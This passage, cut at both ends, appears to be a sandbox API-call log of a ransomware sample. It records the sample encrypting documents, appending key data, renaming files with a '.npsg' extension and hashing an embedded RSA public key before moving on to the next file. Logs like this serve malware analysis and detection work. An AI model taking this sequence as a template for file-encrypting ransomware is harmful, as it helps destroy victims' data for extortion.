Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.513] GetCurrentThreadId () returned 0x5b4 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82438 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.514] GetCurrentThreadId () returned 0x5b4 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400650 [0237.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400668 [0237.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006c8 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400680 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006e0 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400680 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400650 [0237.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400650 | out: hHeap=0x620000) returned 1 [0237.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400638 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400620 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409248 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.519] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x47f7, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb14*=0x47f7, lpOverlapped=0x0) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.519] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x47fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.519] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ceb0 | out: hHeap=0x620000) returned 1 [0237.520] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.520] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.520] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.520] CloseHandle (hObject=0x644) returned 1 [0237.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x3b83cd0 [0237.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.522] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\KxCbm.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\kxcbm.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\KxCbm.odp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\kxcbm.odp.npsg")) returned 1 [0237.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.523] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.525] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17706b80, ftCreationTime.dwHighDateTime=0x1d5b90b, ftLastAccessTime.dwLowDateTime=0x6fae2f80, ftLastAccessTime.dwHighDateTime=0x1d5c1b7, ftLastWriteTime.dwLowDateTime=0x6fae2f80, ftLastWriteTime.dwHighDateTime=0x1d5c1b7, nFileSizeHigh=0x0, nFileSizeLow=0x2a94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n5R3r3ah.xls", cAlternateFileName="")) returned 1 [0237.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ceb0 | out: hHeap=0x620000) returned 1 [0237.525] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\n5R3r3ah.xls") returned=".xls" [0237.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\n5R3r3ah.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\n5r3r3ah.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.526] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=10900) returned 1 [0237.526] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.528] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2a6e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.529] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.531] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.531] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x2a94, lpOverlapped=0x0) returned 1 [0237.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.532] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.533] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.533] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.533] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.533] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.533] GetLastError () returned 0x0 [0237.533] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.533] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.533] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.533] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.534] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2a90) returned 0x3b83cd0 [0237.534] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409248 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400620 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409290 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400638 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400668 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006c8 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400680 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.534] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400668 | out: hHeap=0x620000) returned 1 [0237.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.535] HeapFree (in: 